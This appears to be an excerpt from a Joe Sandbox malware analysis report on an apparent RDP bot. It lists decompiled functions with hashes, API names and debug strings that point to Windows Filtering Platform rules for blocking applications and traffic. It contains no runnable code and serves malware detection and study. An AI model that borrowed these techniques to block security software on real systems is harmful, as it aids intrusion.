                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DestroyEnumFwpmHandle0Providerwcscmp
                                                                                                                                                  • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
                                                                                                                                                  • API String ID: 1522850966-2029202777
                                                                                                                                                  • Opcode ID: fa74e2cb3a6eef84e7a0136588957558bd5e6b714ed79ae53c059174fd424a91
                                                                                                                                                  • Instruction ID: 1ef6549a34dbcaa6c96747777b1acfc211d425775e7fd9620379512cd1626578
                                                                                                                                                  • Opcode Fuzzy Hash: fa74e2cb3a6eef84e7a0136588957558bd5e6b714ed79ae53c059174fd424a91
                                                                                                                                                  • Instruction Fuzzy Hash: 8E517326638BC185F7609B16F5407AAB3A6FB88B94F808135DA8D4BB59EF3DD440C7D0
                                                                                                                                                  Function 00007FF775729621 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,000001EFE9DD14D0,?,00007FF7757214B4,?,?,00000001,00007FF7757214D2), ref: 00007FF775729701
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close0EngineFwpmwcscmp
                                                                                                                                                  • String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
                                                                                                                                                  • API String ID: 4239307310-774261742
                                                                                                                                                  • Opcode ID: c8ff5025d215534188b5837bc80f516c77452d0dc218e8ab1b112ece21252ef0
                                                                                                                                                  • Instruction ID: fa9c149f4510b5b7406283bd049a0e666fa9e2d9dc02e8f95a580b3bae06d1bd
                                                                                                                                                  • Opcode Fuzzy Hash: c8ff5025d215534188b5837bc80f516c77452d0dc218e8ab1b112ece21252ef0
                                                                                                                                                  • Instruction Fuzzy Hash: E2316153B3C64341FA50BB65A5902BA92B1DF4DBD0FD84031EA0E8B796EE5CD98583E0
                                                                                                                                                  Function 00007FF775726497 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                                                  • API String ID: 1799206407-4111913120
                                                                                                                                                  • Opcode ID: dda27c62fac4cd84eb860d51178331786ae83887d0c1dce0a6688692ad44cf8e
                                                                                                                                                  • Instruction ID: 3ac2228833613055456a2c6f11d22446d8461d9e32dc83d163d4a55d95f7844c
                                                                                                                                                  • Opcode Fuzzy Hash: dda27c62fac4cd84eb860d51178331786ae83887d0c1dce0a6688692ad44cf8e
                                                                                                                                                  • Instruction Fuzzy Hash: 8421B852E3C4C782FB24679A9444379A161EF08F1AFE0C537D14F89298DD1DFA8552E2
                                                                                                                                                  Function 00007FF775721C73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 97cf023455eb3308a9bc5fd03e36ddc4e0876cad0f0bd96d056d2edce359639a
                                                                                                                                                  • Instruction ID: 40d1a4c7d97e419247a8d595e0a520ad134224faeb0172a65fdf8bfa965614dc
                                                                                                                                                  • Opcode Fuzzy Hash: 97cf023455eb3308a9bc5fd03e36ddc4e0876cad0f0bd96d056d2edce359639a
                                                                                                                                                  • Instruction Fuzzy Hash: 99F08662A3C69381FA11B756BC005B5A261BF0CFE0F944031DD4C07794EE2DDD46C3A0
                                                                                                                                                  Function 00007FF775728A40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                                                  • Opcode ID: 432cc5b08a59ed410987009eed26220de00fd652b8c5e43ab199aeb58c82218e
                                                                                                                                                  • Instruction ID: be50c8b246e18550571358c728ecb2dbb3bfc769d8a3c1a6a7a62c979cf6ff2e
                                                                                                                                                  • Opcode Fuzzy Hash: 432cc5b08a59ed410987009eed26220de00fd652b8c5e43ab199aeb58c82218e
                                                                                                                                                  • Instruction Fuzzy Hash: 4DF06D53A3C74385FA247B59948017897B1FF4DF54FC09431C44EC6296DE2DE84583A0
                                                                                                                                                  Function 00007FF7757289D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                                                  • Opcode ID: 45a128eb52c9962c86f50bc87fcb50b57fee881ca886fb4f89835b828538d20a
                                                                                                                                                  • Instruction ID: 0be656fbdef346653940ac4632bcbd5a4f7402c769bd66126beccabe65c4b257
                                                                                                                                                  • Opcode Fuzzy Hash: 45a128eb52c9962c86f50bc87fcb50b57fee881ca886fb4f89835b828538d20a
                                                                                                                                                  • Instruction Fuzzy Hash: 0BF06D53A3C74385FA247B59988017897B1FF4DF54FC09432C40EC6296DE2DE94183E0
                                                                                                                                                  Function 00007FF7757289E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                                                  • Opcode ID: fc65974d1da1c42527ce86d347ee06d7c3f6d0bf2a8b09ce55f6eac5d183ddba
                                                                                                                                                  • Instruction ID: fc3990cedc0a96f60cad6860727010c92aac1468fe4a96a2d413827bb734502d
                                                                                                                                                  • Opcode Fuzzy Hash: fc65974d1da1c42527ce86d347ee06d7c3f6d0bf2a8b09ce55f6eac5d183ddba
                                                                                                                                                  • Instruction Fuzzy Hash: 37F06D53A3C74385FA247B59948017897B1FF4DF55FC09431C40EC6296EE2DE84183E0
                                                                                                                                                  Function 00007FF7757289E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                                                  • Opcode ID: 47e6bac6e89e4e6de8860f451505918c7308e9dc35c1b4391f7280eb4103ee9d
                                                                                                                                                  • Instruction ID: f72fc109d1c524c1d0fb9ea5ba62f23f7179c0566222a03ba2c4f48e529f37b7
                                                                                                                                                  • Opcode Fuzzy Hash: 47e6bac6e89e4e6de8860f451505918c7308e9dc35c1b4391f7280eb4103ee9d
                                                                                                                                                  • Instruction Fuzzy Hash: C9F06D53A3C74385FA247B59948017897B1FF4DF54FC09432C40EC6296DE2DE84183E0
                                                                                                                                                  Function 00007FF775721CF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: 1a672da97f7a29b7f12fad7b7b803bf8a240a5dff4c86eb75bc1b190fa6cde4f
                                                                                                                                                  • Instruction ID: 6f2c4172427a1f684d06c1f4bc45544c78b19421cafede955d2980b86200b005
                                                                                                                                                  • Opcode Fuzzy Hash: 1a672da97f7a29b7f12fad7b7b803bf8a240a5dff4c86eb75bc1b190fa6cde4f
                                                                                                                                                  • Instruction Fuzzy Hash: 20F05E22E3AA9781F961BB56BC405B0A260AF1CFA4BC85031CC4D17751ED1DA98583F0
                                                                                                                                                  Function 00007FF775724B0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 31318ca590b0d4edc6b4b8dd1b5f660c6e63fbab622208aafda98c0bb82bb7a9
                                                                                                                                                  • Instruction ID: 5bd4e7f81f42379beb41e091632d4f427e95885871ca6e7c3f230e29be095e54
                                                                                                                                                  • Opcode Fuzzy Hash: 31318ca590b0d4edc6b4b8dd1b5f660c6e63fbab622208aafda98c0bb82bb7a9
                                                                                                                                                  • Instruction Fuzzy Hash: ABF05423F3824741F963BB0578417B991526F89B75F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF775724B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 31318ca590b0d4edc6b4b8dd1b5f660c6e63fbab622208aafda98c0bb82bb7a9
                                                                                                                                                  • Instruction ID: 5bd4e7f81f42379beb41e091632d4f427e95885871ca6e7c3f230e29be095e54
                                                                                                                                                  • Opcode Fuzzy Hash: 31318ca590b0d4edc6b4b8dd1b5f660c6e63fbab622208aafda98c0bb82bb7a9
                                                                                                                                                  • Instruction Fuzzy Hash: ABF05423F3824741F963BB0578417B991526F89B75F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF77572499C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: feb957511d62b8eaeb474345d65e8f4908472f50acb32604004acfb176bd1b87
                                                                                                                                                  • Instruction ID: ec2d63413657b2fa603b4fa87cb7647dab3b29bbcfd721279e475faa39bbbfc2
                                                                                                                                                  • Opcode Fuzzy Hash: feb957511d62b8eaeb474345d65e8f4908472f50acb32604004acfb176bd1b87
                                                                                                                                                  • Instruction Fuzzy Hash: DDF05423F3824741F962BB05B8417B991526F89B75F8945358D5C4A6C1DE3E698382A0
                                                                                                                                                  Function 00007FF7757249A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: e6e6db5c1704923bc2628227bb79bfbea2e4cce4d4de5763f44ce758e01c5958
                                                                                                                                                  • Instruction ID: 67d1be7399e677caee23625330b4174cea5461be801341f27f55d0cf337e1f42
                                                                                                                                                  • Opcode Fuzzy Hash: e6e6db5c1704923bc2628227bb79bfbea2e4cce4d4de5763f44ce758e01c5958
                                                                                                                                                  • Instruction Fuzzy Hash: D6F05423F3824741F962BB0578417B991526F89B75F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF77572497E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction ID: 51be8a490e1e08e4a3f5164ce5822924aa47bcad63ebcc087115975e6d315b41
                                                                                                                                                  • Opcode Fuzzy Hash: 9393f06e29f470aad05a9ac21c8f27fddfefef9e15528d3f3760fb910aa56bb1
                                                                                                                                                  • Instruction Fuzzy Hash: 18F05423F3824741F962BB05B8417B991526F89B71F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF775724988 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
